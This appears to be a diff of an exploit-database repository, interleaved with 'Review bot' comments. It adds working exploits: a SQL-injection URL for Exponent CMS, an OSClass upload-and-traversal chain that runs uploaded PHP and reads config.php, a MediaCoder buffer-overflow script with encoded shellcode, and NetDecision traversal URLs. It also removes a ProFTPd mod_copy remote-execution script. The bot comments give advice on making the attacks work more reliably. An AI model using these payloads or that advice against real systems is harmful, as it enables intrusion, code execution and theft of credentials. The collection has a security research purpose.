+++ b/platforms/php/webapps/36916.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52328/info + +Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected. + +http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20" \ No newline at end of file diff --git a/platforms/php/webapps/36917.txt b/platforms/php/webapps/36917.txt new file mode 100755 index 000000000..e9b79776f --- /dev/null +++ b/platforms/php/webapps/36917.txt 
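Review bot: The PoC is a blind time-based probe and the text offers no way to confirm it beyond the delay: with `or 1=1 AND SLEEP(5)` inside a WHERE clause, MySQL will typically evaluate `SLEEP` for every row it scans, so on a table of any size the response takes far longer than five seconds and may hit the web server's timeout, which is easily misread as a false negative. A `SLEEP(1)` or a `LIMIT`-bounded variant is safer for verification. The doubled slash in `http://www.example.com//exponent/cron/send_reminders.php` looks like a transcription slip and should be a single `/`.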
@@ -0,0 +1,43 @@ +source: http://www.securityfocus.com/bid/52336/info + +OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. + +An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process. + +OSClass 2.3.5 is vulnerable; prior versions may also be affected. + +Arbitrary File Upload Vulnerability: + +1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type) + +2. Upload that file as picture for a new item and get its name (is 5_small.jpg) + +3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php) + +4. Use combine.php to move itself to oc-content/uploads +http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php +now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded) + +5. Use uploads/combine.php to move 5_original.php to /remote.php +http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php + + +6. Run the uploaded php file +http://www.example.com/osclass/remote.php + + + + +Directory Traversal Vulnerability: + +It is possible to download and arbitrary file (ie config.php) under the www root. + +1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding) + +2. Move combine.php into web root +http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php + +3. Run combine to download config.php +http://www.example.com/osclass/combine.php?files=config.php + + diff --git a/platforms/windows/local/36920.py b/platforms/windows/local/36920.py new file mode 100755 index 000000000..6163f8b2c --- /dev/null +++ b/platforms/windows/local/36920.py 
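Review bot: Steps 2 and 5 disagree on the uploaded file's name — step 2 says the picture is stored as `5_small.jpg`, step 5 moves `5_original.jpg` — and step 1 says to rename the PHP file to `.gif` while the stored name ends in `.jpg`; whoever follows this needs to know which generated copy keeps the raw PHP bytes (presumably `_original`, if the resized variants are re-encoded — worth confirming). The chain also leaves artifacts behind: a copy of `combine.php` in `oc-content/uploads/` or the web root and `remote.php` in the web root, all reachable anonymously, so a cleanup note belongs at the end of each procedure. The User-Agent change only makes `combine.php` skip gzip, so the traversal-read `config.php` (which in OSClass normally holds the database credentials) comes back in plain text.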
@@ -0,0 +1,50 @@
+#!/usr/bin/python
+# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
+# Date: 05/May/2015
+# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
+# email: kwiha2003 [at ]yahoo [dot] com=20
+# Version: 0.8.34.5716
+# Tested on: Win XP3
+# Vendor: http://www.mediacoderhq.com/
+# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
+info&file=3DMediaCoder-0.8.34.5716.exe
+
+# Greetz: b33f,corelan,offsec,vulnhub,HUST510
+# Notes: Due to insifficient space after taking control of the EIP, you hav=
+e to jump backwards and also=20
+# avoid a few bad bytes after the "A"s.
+
+#!/usr/bin/python
+buffersize =3D 853
+buffer =3D ("http://" + "\x41" * 256)
+#Space for shellcode to decode
+buffer +=3D "\x90" * 24
+# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c=
+ -e x86/shikata_ga_nai
+#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
+#unsigned char buf[] =3D=20
+buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
+"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
+"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
+"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
+"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
+"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
+"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
+"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
+"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
+"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
+"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
+"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
+"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
+"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
+"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
+buffer +=3D "\x42" * 350
+nseh =3D 
"\xEB\x06\x90\x90"
+# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20
+seh=3D"\xee\x04\x01\x66"
+#Jump back 603 bytes due to insufficient space for shellcode
+jmpbck =3D "\xe9\xA5\xfd\xff\xff"
+junk =3D ("D" * 55)=20
+f=3D open("exploit.m3u",'w')
+f.write(buffer + nseh + seh + jmpbck + junk)
+f.close()
diff --git a/platforms/windows/remote/36803.py b/platforms/windows/remote/36803.py
deleted file mode 100755
index 571b31bb1..000000000
--- a/platforms/windows/remote/36803.py
+++ /dev/null
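Review bot: The file is stored quoted-printable-encoded rather than as plain source — `=3D` stands for `=`, `=20` for a trailing space, and the lone `=` ending the `Software link` and `Notes` header lines is a soft line break — so as committed it does not parse as Python, and the second `#!/usr/bin/python` shebang in the middle of the file is a copy-paste leftover. `buffersize` is assigned but never read. The file handle would be cleaner as `with open("exploit.m3u", "w") as f:` wrapping the single `f.write(...)` call, which makes the explicit `f.close()` unnecessary.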
@@ -1,47 +0,0 @@
-# Title: ProFTPd 1.3.5 Remote Command Execution
-# Date : 20/04/2015
-# Author: R-73eN
-# Software: ProFTPd 1.3.5 with mod_copy
-# Tested : Kali Linux 1.06
-# CVE : 2015-3306
-# Greetz to Vadim Melihow for all the hard work .
-import socket
-import sys
-import requests
-#Banner
-banner = ""
-banner += " ___ __ ____ _ _ \n"
-banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
-banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
-banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
-banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
-print banner
-s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-if(len(sys.argv) < 4):
- print '\n Usage : exploit.py server directory cmd'
-else:
- server = sys.argv[1] #Vulnerable Server
- directory = sys.argv[2] # Path accessible from web .....
- cmd = sys.argv[3] #PHP payload to be executed
- evil = ''
- s.connect((server, 21))
- s.recv(1024)
- print '[ + ] Connected to server [ + ] \n'
- s.send('site cpfr /etc/passwd')
- s.recv(1024)
- s.send('site cpto ' + evil)
- s.recv(1024)
- s.send('site cpfr /proc/self/fd/3')
- s.recv(1024)
- s.send('site cpto ' + directory + 'infogen.php')
- s.recv(1024)
- s.close()
- print '[ + ] Payload sended [ + ]\n'
- print '[ + ] Executing Payload [ + ]\n'
- r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
- if (r.status_code == 200):
- print '[ * ] Payload Executed Succesfully [ * ]'
- else:
- print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
-
-print '\n http://infogen.al/'
\ No newline at end of file
diff --git a/platforms/windows/remote/36915.txt b/platforms/windows/remote/36915.txt
new file mode 100755
index 000000000..bee6e869a
--- /dev/null
+++ b/platforms/windows/remote/36915.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/52327/info
+
+NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+NetDecision 4.6.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini
+http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini
\ No newline at end of file